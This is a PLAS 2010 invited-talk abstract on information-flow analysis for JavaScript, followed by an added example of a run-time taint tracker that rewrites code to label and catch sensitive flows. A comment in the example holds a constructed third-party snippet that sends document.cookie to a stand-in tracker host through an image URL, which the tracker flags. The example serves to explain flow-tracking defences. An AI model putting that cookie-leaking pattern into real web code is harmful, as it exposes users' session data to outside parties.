PLAS 2010 1st Invited Talk

Static, Staged and Dynamic Flow Analyses for JavaScript

Ranjit Jhala
University of California, San Diego
(Joint work with Ravi Chugh, Jeff Meister, Don Jang, Sorin Lerner and Hovav Shacham)

ABSTRACT: Information flow control can offer important security and privacy benefits in the context of JavaScript based web applications that dynamically load third-party code which can steal or corrupt important client information. These benefits have not yet been reaped due to the challenging nature of analyzing JavaScript code. In this talk, we describe three approaches to analyzing JavaScript to enforce flow control: a static analysis, which analyzes the entire program source to overapproximate all possible run-time flows, a staged analysis, that uses the partial results of a static analysis to emit residual checks that are dynamically performed as code gets loaded at run-time, and a fully dynamic analysis that rewrites JavaScript in order to track flows entirely at run-time. We highlight some of the (many!) challenges that must be addressed in order to analyze real-world JavaScript. Finally, we describe results from an empirical investigation of various security and privacy violating flows on a large number of popular websites.
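
The third approach in the abstract, tracking flows at run-time by rewriting the code, can be pictured with the following added example. It is not code from the talk or the authors' tools; the helper names (Labeled, source, binop, sink, runRewrittenSnippet), the "cookie" label, the policy and the tracker.example snippet are all assumptions constructed for illustration.

```javascript
// Added illustration (not the authors' tool): run-time flow tracking by rewriting.
// Every helper name here is hypothetical; the third-party snippet is constructed.
class Labeled {
  constructor(value, labels) { this.value = value; this.labels = labels; }
}
const labelsOf = (v) => (v instanceof Labeled ? v.labels : new Set());
const raw = (v) => (v instanceof Labeled ? v.value : v);

// A source attaches a label to a value read from sensitive client state.
function source(value, label) { return new Labeled(value, new Set([label])); }

// Rewritten form of `a <op> b`: compute on the raw values, union the labels.
function binop(op, a, b) {
  const labels = new Set([...labelsOf(a), ...labelsOf(b)]);
  const result = op(raw(a), raw(b));
  return labels.size ? new Labeled(result, labels) : result;
}

// Rewritten form of a write to a sink: record labels the policy forbids there.
const violations = [];
function sink(name, forbidden, v) {
  const leaked = [...labelsOf(v)].filter((l) => forbidden.includes(l));
  if (leaked.length) violations.push({ sink: name, leaked });
  return raw(v); // the value the original statement would have written
}

// Original third-party snippet (constructed):
//   var q = "c=" + document.cookie;
//   var u = "https://tracker.example/p?" + q;
//   img.src = u;
//   banner.textContent = "Hello " + "world";
function runRewrittenSnippet(cookieValue) {
  violations.length = 0;
  const concat = (x, y) => x + y;
  const cookie = source(cookieValue, "cookie"); // stands in for document.cookie
  const q = binop(concat, "c=", cookie);
  const u = binop(concat, "https://tracker.example/p?", q);
  const written = sink("img.src", ["cookie"], u);
  sink("banner.textContent", ["cookie"], binop(concat, "Hello ", "world"));
  return { written, violations: violations.slice() };
}
```

This sketch follows only explicit data flows through the rewritten operators; a value that influences a sink through a branch condition carries no label here.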